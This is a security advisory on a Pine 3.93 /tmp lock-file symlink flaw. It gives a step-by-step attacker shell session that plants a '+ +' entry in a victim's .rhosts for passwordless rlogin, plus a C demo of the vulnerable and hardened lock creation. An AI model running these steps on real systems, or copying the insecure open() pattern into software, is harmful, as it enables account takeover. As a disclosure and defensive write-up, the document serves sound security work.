COMMAND
Pine 3.93 and earlier
SYSTEMS AFFECTED
Linux Slackware 3.0, Slackware 3.1, and Slackware derived systems.
Non-upgraded Red Hat systems.
PROBLEM
Pine creates a lock file in /tmp whose name is easily guessed, and the
permissions are set read/write for User, Group and Other. The lock file
path can therefore be pre-created as a symbolic link to the victim's
~/.rhosts, which Pine then creates for the attacker and which can then
be written to.
By watching the process table with ps to see which users are running
Pine, one can then do an ls in /tmp/ to gather the lock file names for
each user. Watching the process table again reveals when each user
quits Pine or runs out of unread messages in their INBOX, at which
point Pine deletes the respective lock file, leaving the name free for
the attacker to claim.
Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts
(for a generic example) will cause Pine, the next time hamors starts it,
to create ~hamors/.rhosts as a mode 666 file owned by hamors with Pine's
process id as its contents. Because the file is world-writable, the
attacker may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then
rm /tmp/.hamors_lockfile. A "+ +" entry in .rhosts trusts every user on
every host, so the attacker can then rlogin as the victim without a
password.
For this example, hamors is the victim while catluvr is the
attacker:
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
-rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
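The session above is the attack as observed; the following is an added example, not Pine's own source, that reproduces the underlying defect in C: a lock file created with open() under a guessable name, mode 0666 and no O_EXCL, beside a hardened creation that refuses a planted symlink. The function names, the demo directory under /tmp and the use of .302.f5a4 and .rhosts as stand-in names are illustrative assumptions; the demo runs entirely inside a private mkdtemp() directory and creates both the "victim's" lock and the "attacker's" symlink itself.

```c
#define _XOPEN_SOURCE 700
/* Added example, not Pine's code: vulnerable vs. hardened lock creation. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The lock's contents, as observed in the advisory: the creating pid. */
static int write_pid(int fd)
{
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%ld\n", (long)getpid());
    return write(fd, buf, (size_t)n) == n ? 0 : -1;
}

/* Vulnerable pattern: no O_EXCL, symlinks followed, world-writable mode.
 * If "path" is already a symlink planted by another user, open() follows
 * it and creates (or truncates) the link target under the caller's uid. */
int create_lock_vulnerable(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
    if (fd < 0)
        return -1;
    int rc = write_pid(fd);
    close(fd);
    return rc;
}

/* Hardened pattern: O_EXCL fails if anything already sits at "path"
 * (a planted symlink included, per open(2)), O_NOFOLLOW refuses to
 * traverse a symlink in the final component, and 0600 keeps it private. */
int create_lock_hardened(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    int rc = write_pid(fd);
    close(fd);
    return rc;
}

/* Replays the attack against both functions in a fresh mkdtemp() directory.
 * Returns 0 when the vulnerable pattern is subverted (target created 0666
 * and overwritten with "+ +") and the hardened one refuses to create
 * anything; otherwise the number of the step that did not behave. */
int demo_symlink_attack(void)
{
    char dir[] = "/tmp/lockdemo.XXXXXX";        /* assumed demo location */
    char lock[64], target[64], got[16] = {0};
    struct stat st;
    int rc = 0, fd;
    mode_t old_umask = umask(0);                /* worst case: umask gives no help */

    if (!mkdtemp(dir)) { umask(old_umask); return 1; }
    snprintf(lock, sizeof lock, "%s/.302.f5a4", dir);   /* "victim's" lock name */
    snprintf(target, sizeof target, "%s/.rhosts", dir); /* stands in for ~victim/.rhosts */

    /* Attacker plants the symlink while the lock name is free. */
    if (symlink(target, lock) != 0) { rc = 2; goto out; }

    /* Victim starts Pine: the vulnerable open() follows the link. */
    if (create_lock_vulnerable(lock) != 0) { rc = 3; goto out; }
    if (stat(target, &st) != 0 || (st.st_mode & 0777) != 0666) { rc = 4; goto out; }

    /* Attacker writes "+ +" through the link, as in the advisory. */
    if ((fd = open(lock, O_WRONLY | O_TRUNC)) < 0) { rc = 5; goto out; }
    if (write(fd, "+ +\n", 4) != 4) { close(fd); rc = 5; goto out; }
    close(fd);
    if ((fd = open(target, O_RDONLY)) < 0) { rc = 6; goto out; }
    if (read(fd, got, sizeof got - 1) != 4 || strcmp(got, "+ +\n") != 0) { close(fd); rc = 6; goto out; }
    close(fd);

    /* Same planted link against the hardened pattern: EEXIST or ELOOP, no file. */
    unlink(target);
    if (create_lock_hardened(lock) == 0 || (errno != EEXIST && errno != ELOOP)) { rc = 7; goto out; }
    if (stat(target, &st) == 0) { rc = 8; goto out; }

out:
    unlink(lock);
    unlink(target);
    rmdir(dir);
    umask(old_umask);
    return rc;
}

int main(void)
{
    int rc = demo_symlink_attack();
    if (rc == 0)
        printf("vulnerable pattern subverted, hardened pattern refused\n");
    else
        printf("demo failed at step %d\n", rc);
    return rc;
}
```

The hardened variant only closes the hole shown here; a lock kept in a per-user directory that other users cannot write to, rather than in a shared /tmp, removes the attacker's ability to plant the name at all.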
SOLUTION
Disable Pine until it has been upgraded to version 3.95. Also check
users' ~/.rhosts files for world-writable permissions or "+ +" entries
planted before the upgrade.